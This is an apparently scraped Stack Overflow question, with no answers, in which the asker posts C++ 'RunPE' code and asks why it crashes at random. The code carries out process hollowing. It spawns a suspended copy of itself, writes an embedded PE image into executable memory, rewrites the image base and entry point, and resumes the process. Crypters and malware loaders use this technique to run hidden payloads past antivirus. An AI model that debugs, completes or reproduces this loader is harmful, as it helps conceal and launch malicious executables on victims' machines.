Randomly Crash "The application was unable to start correctly" for executing a few memory code

Question

Randomly Crash "The application was unable to start correctly" for executing a few memory code

I got this code from "RunPE" at GitHub:

#include  <iostream>
#include  <string> 
#include  <Windows.h> 
#include  <TlHelp32.h>
#include  <iomanip>
#include  <fstream>
#include "stdafx.h"
#include <Windows.h>


int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    try{
    IMAGE_DOS_HEADER* DOSHeader; 
    IMAGE_NT_HEADERS* NtHeader; 
    IMAGE_SECTION_HEADER* SectionHeader;

    PROCESS_INFORMATION PI;
    STARTUPINFOA SI;

    CONTEXT* CTX;

    DWORD* ImageBase;
    void* pImageBase; 

    int count;
    char CurrentFilePath[1024];

    DOSHeader = PIMAGE_DOS_HEADER(rawData); 
    NtHeader = PIMAGE_NT_HEADERS(DWORD(rawData) + DOSHeader->e_lfanew); 

    GetModuleFileNameA(0, CurrentFilePath, 1024);

    if (NtHeader->Signature == IMAGE_NT_SIGNATURE) 
    {
        ZeroMemory(&PI, sizeof(PI)); 
        ZeroMemory(&SI, sizeof(SI)); 

        if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
            CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
        {
            CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
            CTX->ContextFlags = CONTEXT_FULL;

            if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) 
            {
                ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);

                pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
                    NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

                WriteProcessMemory(PI.hProcess, pImageBase, rawData, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

                for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
                {
                    SectionHeader = PIMAGE_SECTION_HEADER(DWORD(rawData) + DOSHeader->e_lfanew + 248 + (count * 40));

                    WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
                        LPVOID(DWORD(rawData) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
                }
                WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
                    LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

                CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
                SetThreadContext(PI.hThread, LPCONTEXT(CTX));
                ResumeThread(PI.hThread);


            }
        }
    }
    }catch(...){

    }
}

The problem is , It works but I get this error Randomly :

The application was unable to start correctly (0xc0000005). click OK to close the application.

I have any value to create this crash, and I debugged in step mode, it had no result.

Where I made mistake? And how can I fix it?

+rawData is a pe converted with HxD software.

c++

memory

asked on Stack Overflow Apr 3, 2018 by

Dr.Nefario • edited Nov 19, 2019 by

Thomas

0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0